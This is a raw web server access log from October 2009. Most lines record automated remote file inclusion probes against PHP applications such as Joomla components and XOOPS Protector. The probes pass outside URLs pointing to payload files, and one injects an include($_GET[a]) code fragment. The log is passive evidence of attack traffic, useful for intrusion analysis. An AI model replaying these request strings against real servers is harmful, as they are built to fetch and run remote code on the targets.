125.251.147.194 - - [13/Oct/2009:02:41:42 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:02:41:42 -0400] "GET /logs/access_log.Q109060400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:42:06 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:42:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [13/Oct/2009:02:42:39 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
174.143.3.188 - - [13/Oct/2009:02:42:39 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
174.143.3.188 - - [13/Oct/2009:02:42:40 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
174.143.3.188 - - [13/Oct/2009:02:42:40 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
121.78.82.142 - - [13/Oct/2009:02:42:54 -0400] "GET /logs/access_log.Q109051400/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:42:59 -0400] "GET /admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:42:59 -0400] "GET /logs/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:42:59 -0400] "GET /logs/access_log.Q109092900/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:43:01 -0400] "GET /logs/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:43:01 -0400] "GET /admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:43:01 -0400] "GET /logs/access_log.Q109092900/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:43:16 -0400] "GET /logs/access_log.Q109092600/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:43:47 -0400] "GET /logs/access_log.Q109092900%20%20/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:02:43:59 -0400] "GET /logs/access_log.Q109092900%20%20/admin_modules/admin_module_captions.inc.php?%20config[path_src_include]=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:41 -0400] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:41 -0400] "GET /logs/access_log.Q109063000/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:41 -0400] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:44 -0400] "GET /logs/access_log.Q109063000%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:44 -0400] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:44 -0400] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:55 -0400] "GET /logs/access_log.Q109060700/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:44:58 -0400] "GET /logs/access_log.Q109060700%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:21 -0400] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:21 -0400] "GET /logs/access_log.Q109063000/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:22 -0400] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:35 -0400] "GET /logs/access_log.Q109060700/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:36 -0400] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:36 -0400] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:37 -0400] "GET /logs/access_log.Q109063000/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:45:42 -0400] "GET /logs/access_log.Q109060700/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:45:47 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 200 21659 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:45:47 -0400] "GET /logs/access_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:45:55 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:46:34 -0400] "GET /?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:46:34 -0400] "GET /logs/access_log.Q109072900/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:46:34 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:46:41 -0400] "GET /logs/access_log.Q109090900/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:47:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [13/Oct/2009:02:47:50 -0400] "GET /logs/access_log.Q109063000%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:02:47:50 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:02:47:50 -0400] "GET /logs/access_log.Q109052500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:02:47:50 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:47:56 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:47:56 -0400] "GET /?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:47:57 -0400] "GET /logs/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:47:58 -0400] "GET /?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:47:58 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:47:58 -0400] "GET /logs/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:48:12 -0400] "GET /logs/access_log.Q109052900/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 308 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:48:12 -0400] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:48:14 -0400] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 286 "-" "libwww-perl/5.803"
77.242.37.212 - - [13/Oct/2009:02:48:34 -0400] "GET /logs/error_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:48:42 -0400] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:48:42 -0400] "GET /logs/access_log.Q109063000/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:48:42 -0400] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:48:51 -0400] "GET /logs/access_log.Q109060700/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:48:55 -0400] "GET /logs/access_log.Q109090300/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 308 "-" "libwww-perl/5.803"
222.73.17.7 - - [13/Oct/2009:02:49:00 -0400] "GET /?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:49:00 -0400] "GET /logs/access_log.Q109072900/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:49:00 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:49:05 -0400] "GET /logs/access_log.Q109090900/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:49:12 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:49:14 -0400] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:49:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:49:20 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:49:24 -0400] "GET /logs/error_log.Q109090500//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:49:28 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 200 21659 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:49:28 -0400] "GET /logs/access_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:49:46 -0400] "GET /logs/access_log.Q109063000%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.209.136.101 - - [13/Oct/2009:02:49:51 -0400] "GET /logs/access_log.Q109060700%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:50:05 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:50:30 -0400] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:50:30 -0400] "GET /logs/access_log.Q109090900%20%20/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:50:41 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:51:04 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:51:04 -0400] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:51:04 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:51:20 -0400] "GET /logs/error_log.Q109090500//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:52:21 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
209.59.12.99 - - [13/Oct/2009:02:52:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [13/Oct/2009:02:52:43 -0400] "GET /logs/access_log.Q109052500/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:02:52:43 -0400] "GET /logs/access_log.Q109052000/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:52:50 -0400] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:52:50 -0400] "GET /logs/access_log.Q109090900%20%20/?INCLUDE_FOLDER=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:02:53:25 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
174.143.3.188 - - [13/Oct/2009:02:53:25 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [13/Oct/2009:02:53:26 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [13/Oct/2009:02:53:26 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/3.0 (OS/2; U)"
77.242.37.212 - - [13/Oct/2009:02:53:41 -0400] "GET /logs/error_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:02:53:50 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:02:53:50 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:02:53:50 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:02:53:51 -0400] "GET /logs/access_log.Q109063000//?sourcedir=http://banlat.ac.th/22.jpg???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
125.251.147.194 - - [13/Oct/2009:02:53:51 -0400] "GET //?sourcedir=http://banlat.ac.th/22.jpg???? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
125.251.147.194 - - [13/Oct/2009:02:53:51 -0400] "GET /logs//?sourcedir=http://banlat.ac.th/22.jpg???? HTTP/1.1" 200 21657 "-" "libwww-perl/5.805"
125.251.147.194 - - [13/Oct/2009:02:54:07 -0400] "GET /logs/access_log.Q109051900//?sourcedir=http://banlat.ac.th/22.jpg???? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
72.11.145.8 - - [13/Oct/2009:02:54:22 -0400] "GET /logs/access_log.Q109071700%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.246.190.222 - - [13/Oct/2009:02:56:19 -0400] "GET /logs/access_log.Q109073000 HTTP/1.1" 200 4555164 "-" "kptwyshckqyb1cdeygxetieck"
221.143.46.189 - - [13/Oct/2009:02:57:29 -0400] "GET /logs/access_log.Q109051800%20//zero_vote/ask_password.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
221.143.46.189 - - [13/Oct/2009:02:57:32 -0400] "GET /logs/access_log.Q109051700%20//zero_vote/ask_password.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
209.59.12.99 - - [13/Oct/2009:02:57:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.251.147.194 - - [13/Oct/2009:02:58:42 -0400] "GET /logs/access_log.Q109051900%20//?sourcedir=http://banlat.ac.th/22.jpg???? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
72.11.145.8 - - [13/Oct/2009:02:59:00 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:02:59:00 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:02:59:00 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:03:00:54 -0400] "GET /logs/access_log.Q109090900/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:03:00:54 -0400] "GET /logs/error_log.Q109071800/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:03:01:20 -0400] "GET /logs/error_log.Q109071800/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:03:01:20 -0400] "GET /logs/access_log.Q109090900/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:03:01:23 -0400] "GET /logs/access_log.Q109071700%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.78.234 - - [13/Oct/2009:03:01:29 -0400] "GET /logs/error_log.Q109081400 HTTP/1.0" 200 4307905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.234 - - [13/Oct/2009:03:01:37 -0400] "GET /logs/error_log.Q109081400 HTTP/1.0" 200 4307905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.124.127.164 - - [13/Oct/2009:03:03:19 -0400] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:03:03:19 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
